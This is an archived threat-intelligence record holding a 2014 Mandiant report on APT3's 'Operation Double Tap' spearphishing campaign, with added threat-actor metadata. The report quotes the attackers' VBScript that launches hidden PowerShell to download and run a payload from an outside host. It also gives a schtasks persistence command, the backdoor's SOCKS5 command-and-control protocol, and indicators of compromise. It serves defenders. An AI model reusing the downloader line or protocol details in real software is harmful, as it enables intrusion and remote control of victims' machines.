{
	"id": "649517bc-0962-4958-a7ff-e1530cc0f4bf",
	"created_at": "2026-04-06T00:09:42.456486Z",
	"updated_at": "2026-04-10T03:37:26.216883Z",
	"deleted_at": null,
	"sha1_hash": "fe5038eef3441bac0276cba4f5ef6c0ef504ccf9",
	"title": "Operation Double Tap | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63515,
	"plain_text": "Operation Double Tap | Mandiant\r\nBy Mandiant\r\nPublished: 2014-11-21 · Archived: 2026-04-05 14:31:17 UTC\r\nWritten by: Ned Moran, Mike Scott, Mike Oppenheim, Joshua Homan\r\nAPT3 (also known as UPS), the actors responsible for Operation Clandestine Fox has quietly continued to send\r\nwaves of spearphishing messages over the past few months. This actor initiated their most recent campaign on\r\nNovember 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\r\nCVE-2014-6332 and CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows\r\nOLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation\r\nvulnerability that was disclosed publicly on 2014-10-14.\r\nThe use of CVE-2014-6332 is notable, as it demonstrates that multiple classes of actors, both criminal and APT\r\nalike, have now incorporated this exploit into their toolkits. Further, the use of both of these two known\r\nvulnerabilities in tandem is notable for APT3. This actor is historically known for leveraging zero-day\r\nvulnerabilities in widespread but infrequent phishing campaigns. The use of known exploits and more frequent\r\nattacks may indicate both a shift in strategy and operational tempo for this group.\r\nThe Spearphish\r\nThe body of the message is below:\r\nOne Month's Free Membership for The PLAYBOY ClUB 1080P HD VIDEOS 100,000 PHOTOS 4,000 MODELS\r\nNude Celebrities,Playmates,Cybergirls \u0026 More! Click hxxp://join.playboysplus.com/signup/ To Get a Free Plus\r\nMember Now \u0026 Never Miss Another Update. Your Member referrals must remain active. 
If anyone getting\r\n\"Promotion not available\" for 1 month free membership, you might get the issue up to 48 hrs once your\r\nmembership is expired and make sure to Clear out cookies or use another browser or use another PC.\r\nThe webpage contained both CVE-2014-6332 exploit code and a VBScript that invoked PowerShell on the\r\naffected users’ system to download the below payload:\r\nfunction runmumaa()\r\nOn Error Resume Next\r\nset shell=createobject(\"Shell.Application\")\r\nshell.ShellExecute \"powershell.exe\",\"-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden ( New-Object\r\n“System.Net.WebClient”).DownloadFile(“http://www.playboysplus.com /install/install.exe”,”install.exe”);Invoke-Item install.exe\", \"\", \"open\", 1\r\nend function\r\nhttps://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html\r\nPage 1 of 5\n\nThe CVE-2014-6332 exploit code seen in this incident is derived from the code published at http://www.exploit-db.com/exploits/35230/, which has also been incorporated in the Metasploit project.\r\nThe Downloader\r\nAfter the exploit or script executes, the system downloads install.exe, which has the following metadata:\r\nMD5 5a0c4e1925c76a959ab0588f683ab437\r\nSize 46592 bytes\r\nCompile Time 2014-11-19 08:55:10Z\r\nImport Hash 6b8611f8148a6b51e37fd68e75b6a81c\r\nThe file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\\Users\\Public”,\r\nwhich fails on Windows XP because that path is not present by default.\r\nThe first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the\r\nelevated privileges. 
These files have the following metadata:\r\ndoc.exe (x86):\r\nMD5 492a839a3bf9c61b7065589a18c5aa8d\r\nSize 12288 bytes\r\nImport Hash 9342d18e7d315117f23db7553d59a9d1\r\ndoc.exe (x64):\r\nMD5 744a17a3bc6dbd535f568ef1e87d8b9a\r\nSize 13824 bytes\r\nCompile Time 2014-11-19 08:25:45Z\r\nImport Hash 2fab77a3ff40e4f6d9b5b7e813c618e4\r\ntest.exe:\r\nMD5 5c08957f05377004376e6a622406f9aa\r\nSize 11264 bytes\r\nCompile Time 2014-11-18 10:49:23Z\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nThese payload files also have interesting PDB debug strings.\r\ninstall.exe:\r\nc:\\Users\\aa\\Documents\\Visual Studio 2008\\Projects\\MShell\\Release\\MShell.pdb\r\ndoc.exe:\r\nc:\\Users\\aa\\Documents\\Visual Studio 2008\\Projects\\4113\\Release\\4113.pdb\r\ntest.exe:\r\nC:\\Users\\aa\\Documents\\Visual Studio 2010\\Projects\\MyRat\\Client\\Client\\obj\\x86\\Release\\Client.pdb\r\nThe most interesting PDB string is “4113.pdb,” which appears to reference CVE-2014-4113. This CVE is a\r\nlocal kernel vulnerability that, when successfully exploited, gives any user SYSTEM access on the machine.\r\nThe malware component, test.exe, runs the Windows command \"cmd.exe /C whoami\" to verify it is running with\r\nthe elevated privileges of “System” and creates persistence by creating the following scheduled task:\r\nschtasks /create /tn \"mysc\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON /ru \"System\"\r\nWhen executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913.\r\nThe malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05\r\n00\". 
The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01\r\nc0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address\r\nand 00 51 is the port in network byte order).\r\nOnce the connection to the server is established, the malware expects a message containing at least three bytes\r\nfrom the server. These first three bytes are the command identifier. The following commands are supported by the\r\nmalware:\r\nCommand ID | Description\r\n00 00 00 | Content after the command ID is written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe\r\n00 00 01 | Deletes the files C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe and C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe\r\n00 00 02 | Malware exits\r\n00 00 03 | Malware downloads the URL that follows the command ID. The file is saved to C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe\r\n00 00 04 | Content after the command ID is written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe\r\n00 00 05 | The files notepad1.exe and notepad2.exe are concatenated and written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe, which is then executed\r\n00 00 06 | The contents of C:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt are sent to the server\r\n00 00 07 | The string following the command ID is executed using \"cmd /C\" and the results are sent to the server\r\nLinks to APT3\r\nOn October 28, we observed APT3 sending out spearphishing messages containing a compressed executable\r\nattachment. The extracted executable was a variant of the same downloader described above and connected to\r\n198.55.115.71 over port 1913 via SOCKS5 proxy. 
The secondary payload in that case was detected as\r\nBackdoor.APT.CookieCutter (aka Pirpi), was also named newnotepad.exe (MD5\r\n8849538ef1c3471640230605c2623c67), and connected to the following known APT3 infrastructure:\r\ninform.bedircati[.]com\r\npn.lamb-site[.]com\r\n210.109.99.64\r\nThe 192.184.60.229 IP address seen in this current campaign also hosts securitywap[.]com – another known\r\ndomain referenced in our Operation Clandestine Fox blog.\r\nDOMAIN FIRST SEEN LAST SEEN IP ADDRESS\r\nsecuritywap.com 2014-11-17 2014-11-20 192.184.60.229\r\nwww.securitywap.com 2014-11-17 2014-11-20 192.184.60.229\r\nIn addition, the join.playboysplus[.]com exploit and payload delivery site resolves to 104.151.248.173.\r\nThis IP has hosted other domains used by APT3 in past campaigns:\r\nDOMAIN FIRST SEEN LAST SEEN IP ADDRESS\r\njoin.playboysplus[.]com 2014-11-21 2014-11-21 104.151.248.173\r\nwalterclean[.]com 2014-11-18 2014-11-20 104.151.248.173\r\nwww.walterclean[.]com 2014-11-18 2014-11-20 104.151.248.173\r\nAs we discussed in our previous blog detailing earlier APT3 activity, walterclean[.]com served as a\r\nPlugX/Kaba command and control server.\r\nConclusion\r\nAlthough APT3 is well known for employing zero-day exploits in their attacks, recent activity has demonstrated\r\nthat they will also attack targets with known exploits or social engineering.\r\nSince Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day exploits may\r\nindicate that this group has changed strategy and has decided to attack more frequently, and that it does not have\r\nsteady access to zero-day exploit code. 
No matter the strategy, this actor has shown an ability to operate\r\nsuccessfully.\r\nHere are the IOCs for this threat.\r\nSource: https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html"
	],
	"report_names": [
		"operation_doubletap.html"
	],
	"threat_actors": [
		{
			"id": "13354d3f-3f40-44ec-b42a-3cda18809005",
			"created_at": "2022-10-25T15:50:23.275272Z",
			"updated_at": "2026-04-10T02:00:05.36519Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"APT3",
				"Gothic Panda",
				"Pirpi",
				"UPS Team",
				"Buckeye",
				"Threat Group-0110",
				"TG-0110"
			],
			"source_name": "MITRE:APT3",
			"tools": [
				"OSInfo",
				"schtasks",
				"PlugX",
				"LaZagne",
				"SHOTPUT",
				"RemoteCMD"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cf826655-5fcb-4331-bdc5-5ef267db9d3c",
			"created_at": "2025-08-07T02:03:24.631402Z",
			"updated_at": "2026-04-10T02:00:03.608938Z",
			"deleted_at": null,
			"main_name": "BRONZE MAYFAIR",
			"aliases": [
				"APT3 ",
				"Gothic Panda ",
				"Pirpi",
				"TG-0110 ",
				"UPSTeam"
			],
			"source_name": "Secureworks:BRONZE MAYFAIR",
			"tools": [
				"Cookiecutter",
				"HUC Proxy Malware (Htran)",
				"Pirpi",
				"PlugX",
				"SplitVPN",
				"UPS",
				"ctt",
				"ctx"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "06f622cb-3a78-49cf-9a4c-a6007a69325f",
			"created_at": "2022-10-25T16:07:23.315239Z",
			"updated_at": "2026-04-10T02:00:04.537826Z",
			"deleted_at": null,
			"main_name": "APT 3",
			"aliases": [
				"APT 3",
				"Boron",
				"Brocade Typhoon",
				"Bronze Mayfair",
				"Buckeye",
				"G0022",
				"Gothic Panda",
				"Group 6",
				"Operation Clandestine Fox",
				"Operation Clandestine Fox, Part Deux",
				"Operation Clandestine Wolf",
				"Operation Double Tap",
				"Red Sylvan",
				"TG-0110",
				"UPS Team"
			],
			"source_name": "ETDA:APT 3",
			"tools": [
				"APT3 Keylogger",
				"Agent.dhwf",
				"BKDR_HUPIGON",
				"Backdoor.APT.CookieCutter",
				"Badey",
				"Bemstour",
				"CookieCutter",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EXL",
				"EternalBlue",
				"HTran",
				"HUC Packet Transmit Tool",
				"Hupigon",
				"Hupigon RAT",
				"Kaba",
				"Korplug",
				"LaZagne",
				"MFC Huner",
				"OSInfo",
				"Pirpi",
				"PlugX",
				"RedDelta",
				"RemoteCMD",
				"SHOTPUT",
				"Sogu",
				"TIGERPLUG",
				"TTCalc",
				"TVT",
				"Thoper",
				"Xamtrav",
				"remotecmd",
				"shareip",
				"w32times"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434182,
	"ts_updated_at": 1775792246,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.pdf",
		"text": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.txt",
		"img": "https://archive.orkl.eu/fe5038eef3441bac0276cba4f5ef6c0ef504ccf9.jpg"
	}
}